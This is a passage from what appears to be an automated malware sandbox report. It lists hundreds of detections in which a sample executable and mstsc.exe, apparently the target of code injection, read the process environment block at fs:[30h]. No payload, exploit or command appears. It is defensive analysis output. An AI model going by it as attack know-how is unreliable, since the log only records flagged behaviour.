          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011B1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01176C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01176C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01176C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01176C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0112BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0118C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0118C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0112A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0111746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0110849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011C8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011B14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01176CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01176CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01176CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0111F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0118FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0118FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011C070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011C070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0112A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0112A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010F4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010F4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0112E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0110EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0110FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011C8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01177794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01177794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01177794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01108794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011337F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0112A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0112A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010FC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010FC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010FC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01128E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011B1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011AFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_010FE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01107E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01107E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01107E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01107E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01107E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01107E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011BAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011BAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0111AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0111AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0111AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0111AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0111AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0110766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_0118FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011746A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011C0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011C0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011C0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011C8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_01138EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011AFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011236CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011216E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Ms5nQdSz5l.exeCode function: 9_2_011076E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F858EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05058D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_0500A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05003540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FBF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FBF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FBF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F9849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F89080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FA746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_050069A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_050505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_050505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FA0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FA0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FBA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_050051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_050051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_050051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_050051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05006DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05006DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05006DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05006DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05006DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05006DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FBBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_050141E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05038DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05041C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_0505740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_0505740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_0505740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05006C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05006C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05006C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05006C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05054015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05054015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05007016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05007016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05007016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F9D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F9D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_0501C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_0501C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FBFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FBFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05051074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05042073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FAC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FBA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05003884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05003884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F8B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F8B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FAC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FAC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F8C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FA7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FAB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FAB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F8AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_0501B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_0501B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_0501B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_0501B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_0501B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_0501B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05058CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FA4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05006CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05006CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05006CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_050414FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_0505070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_0505070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_0501FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_0501FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F976E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_0504131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FB36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F9AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F9AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FBFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04F852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05058B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_05058F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FBD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FBD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_0503D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FC927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 23_2_04FAAE73 mov eax, dword ptr fs:[00000030h]
